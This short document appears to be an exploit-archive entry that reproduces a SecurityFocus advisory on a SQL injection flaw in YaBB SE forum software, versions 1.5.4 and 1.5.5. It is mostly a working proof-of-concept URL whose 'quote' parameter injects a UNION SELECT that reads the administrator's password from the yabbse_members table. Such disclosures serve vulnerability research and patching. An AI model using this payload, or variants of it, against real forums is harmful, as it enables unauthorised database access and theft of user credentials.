8 lines
No EOL
614 B
Text
8 lines
No EOL
614 B
Text
source: http://www.securityfocus.com/bid/9674/info
|
|
|
|
It has been reported that YaBB SE may be prone to a SQL injection vulnerability that may allow a remote user to inject arbitrary SQL queries into the database used by the software.
|
|
|
|
YaBB SE versions 1.5.4 and 1.5.5 have been reported to be affected by this issue, however, other versions could be affected as well.
|
|
|
|
http://www.example.com/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,nul
|
|
l,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/* |